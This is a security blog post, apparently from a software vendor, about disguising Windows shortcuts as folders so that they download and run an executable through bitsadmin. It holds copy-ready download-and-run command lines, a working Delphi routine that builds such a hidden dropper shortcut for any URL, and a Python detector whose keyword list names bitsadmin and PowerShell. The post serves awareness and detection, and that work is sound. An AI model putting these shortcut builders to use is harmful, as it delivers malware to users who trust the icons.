Our security researcher and Lead Developer (@DarkCoderSc) came across a way of installing malware on a Microsoft Windows operating system using the well-known shortcut mechanism that nearly everybody uses and blindly trusts.
Because of its very nature, it is quite hard to detect, and removal might be even more difficult.
To describe this threat, we first need to introduce a native Windows program, the BITSAdmin tool, which has been included in Windows since Windows XP SP2. Follow this MSDN link for more information about what it is used for and how to use it.
Basically, this command line tool was designed to create download tasks and to monitor their progress. Offering such a tool on the command line is dangerous, since bitsadmin.exe is of course signed by Microsoft, trusted by antivirus software, and able to download a file in a single command line:
bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe
Now let's use this command line tool as the target of a new Windows shortcut.
Right click somewhere in Explorer (for example on a free space of your desktop), click 'Create a new shortcut', and enter the following as the location:
cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"
Then save it.
Now right click on shortcut, then select Properties.
Switch the 'Run' option to 'Run Minimized'
Finally, change the icon to one of your choice (for example a folder icon).
To keep the icon intact when the shortcut is shared, it is recommended to take it from shell32.dll, since shell32.dll is natively available on any Windows system.
Note: shell32.dll is not the only icon source on a Microsoft system; ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll etc. also contain many useful icons.
The same shortcut can be generated programmatically. The following Delphi routine builds it through the IShellLink COM interface:

uses
  Windows, ActiveX, ShlObj, ComObj;

// Writes a shortcut (destFile) that launches cmd.exe with a bitsadmin
// command line downloading fileUrl into %temp% and then running it.
function MaliciousLnk(fileUrl, destFile: String): Boolean;
var
  cObject: IUnknown;
  shellLink: IShellLink;
  PFile: IPersistFile;
  Cmd: String;
begin
  Result := False;
  CoInitialize(nil);
  try
    cObject := CreateComObject(CLSID_ShellLink);
    shellLink := cObject as IShellLink;
    PFile := cObject as IPersistFile;
    // Arguments handed to cmd.exe: download with bitsadmin, then execute
    Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileUrl + '" %temp%\tmp.exe & %temp%\tmp.exe"';
    shellLink.SetDescription('www.phrozensoft.com');
    shellLink.SetPath('cmd.exe');
    shellLink.SetArguments(PWideChar(Cmd));
    // Same as choosing 'Minimized' in the shortcut's Run option
    shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
    shellLink.SetWorkingDirectory('%windir%\system32\');
    // Icon taken from shell32.dll, present on every Windows install
    shellLink.SetIconLocation('shell32.dll', 1);
    Result := PFile.Save(PWideChar(destFile), False) = S_OK;
  finally
    CoUninitialize();
  end;
end;
bitsadmin.exe is just one example of what a Windows shortcut can be made to do; basically, it can run anything malicious that can be run from a command line, like:
Note: For regular Windows users who don't need PowerShell (which is enabled by default), we recommend removing the feature. This would mitigate all malware that exploits PowerShell to install malicious code.
Go to the Programs and Features utility (the native Windows uninstaller window) and click 'Turn Windows features on or off'.
Scroll down to the PowerShell list item, then uncheck its checkbox.
Never blindly trust shortcuts you encounter. They might hide malicious code that your favourite antivirus software does not detect. The end result might even be a compromised or locked system.
Take the time to open the properties of an unknown shortcut and see which command line it would try to execute.
If you have any doubt, remove it!
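As an added example (not Phrozen's code), here is a small Python script that applies the advice above without relying on the Properties dialog: it parses the binary layout of a .lnk file (the MS-SHLLINK format) and reports the same fields the Delphi routine sets, namely the target path, the arguments, the Run setting and the icon source, then flags the combination described in this post: a cmd.exe or PowerShell target, bitsadmin, a URL or %temp% in the arguments, a minimized window, and an icon borrowed from a system DLL. It runs on any OS, no COM needed. The sample shortcut it inspects is constructed inline for the demo; the URL in it is a placeholder.

```python
import struct
from dataclasses import dataclass

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits of the ShellLinkHeader (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1, 2, 4, 8
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 16, 32, 64, 128
SW_SHOWMINNOACTIVE = 7  # the 'Minimized' choice of the shortcut's Run option


@dataclass
class ShortcutInfo:
    target: str = ""         # LocalBasePath from the LinkInfo structure
    name: str = ""           # description shown as the tooltip
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""
    icon_index: int = 0
    show_command: int = 1


def parse_lnk(data: bytes) -> ShortcutInfo:
    """Read the header, skip the IDList, take the local path from LinkInfo and the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    info = ShortcutInfo(icon_index=icon_index, show_command=show_cmd)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        size, _hdr, info_flags, _vol_off, base_off = struct.unpack_from("<5I", data, pos)
        if info_flags & 1:                       # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            end = data.index(b"\x00", pos + base_off)
            info.target = data[pos + base_off:end].decode("cp1252")
        pos += size

    def read_string() -> str:                    # StringData: CountCharacters, then chars, no terminator
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    if flags & HAS_NAME:
        info.name = read_string()
    if flags & HAS_RELATIVE_PATH:
        read_string()
    if flags & HAS_WORKING_DIR:
        info.working_dir = read_string()
    if flags & HAS_ARGUMENTS:
        info.arguments = read_string()
    if flags & HAS_ICON_LOCATION:
        info.icon_location = read_string()
    return info


COMMAND_HOSTS = ("cmd.exe", "powershell.exe")
SUSPICIOUS_TOKENS = ("bitsadmin", "powershell", "http://", "https://", "%temp%")


def assess_shortcut(info: ShortcutInfo) -> list:
    """Return findings for the traits described in the post; an empty list means none were seen."""
    findings = []
    target_name = info.target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if target_name in COMMAND_HOSTS:
        findings.append(f"target is a command interpreter: {target_name}")
    for token in SUSPICIOUS_TOKENS:
        if token in info.arguments.lower():
            findings.append(f"arguments contain '{token}'")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("window runs minimized (SW_SHOWMINNOACTIVE)")
    if target_name in COMMAND_HOSTS and info.icon_location.lower().endswith(".dll"):
        findings.append(f"icon borrowed from {info.icon_location} while the target is a command interpreter")
    return findings


def build_sample_lnk(target, arguments, name, working_dir, icon, show_cmd) -> bytes:
    """Construct a minimal .lnk blob (LinkInfo + StringData, no IDList) so the parser can be exercised."""
    flags = HAS_LINK_INFO | HAS_NAME | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = (struct.pack("<I16sII", 0x4C, LINK_CLSID, flags, 0x20) + bytes(24)   # three zero FILETIMEs
              + struct.pack("<IiIH", 0, 1, show_cmd, 0) + bytes(10))              # size, icon, show, hotkey, reserved
    volume_id = struct.pack("<4I", 0x11, 3, 0, 0x10) + b"\x00"                     # DRIVE_FIXED, empty label
    base_path = target.encode("cp1252") + b"\x00"
    base_off = 0x1C + len(volume_id)
    link_info = struct.pack("<7I", base_off + len(base_path) + 1, 0x1C, 1, 0x1C, base_off, 0,
                            base_off + len(base_path)) + volume_id + base_path + b"\x00"

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return (header + link_info + string_data(name) + string_data(working_dir)
            + string_data(arguments) + string_data(icon))


# Constructed sample mirroring the shortcut from the post (placeholder URL, not a real download)
SAMPLE_ARGS = ('/C "%windir%\\System32\\bitsadmin.exe /transfer downloader /priority normal '
               'https://example.invalid/setup.exe %temp%\\setup.exe & %temp%\\setup.exe"')
SAMPLE_LNK = build_sample_lnk("C:\\Windows\\System32\\cmd.exe", SAMPLE_ARGS, "www.phrozensoft.com",
                              "%windir%\\system32\\", "shell32.dll", SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(f"target={parsed.target!r} show={parsed.show_command} args={parsed.arguments!r}")
    for finding in assess_shortcut(parsed):
        print(" -", finding)
```

To check a real shortcut, pass the bytes of the file to parse_lnk(). A shortcut with no findings is not automatically safe, since the script only looks for the pattern this post describes, but any finding is a reason to open the Properties dialog, or simply delete the file, before double-clicking it.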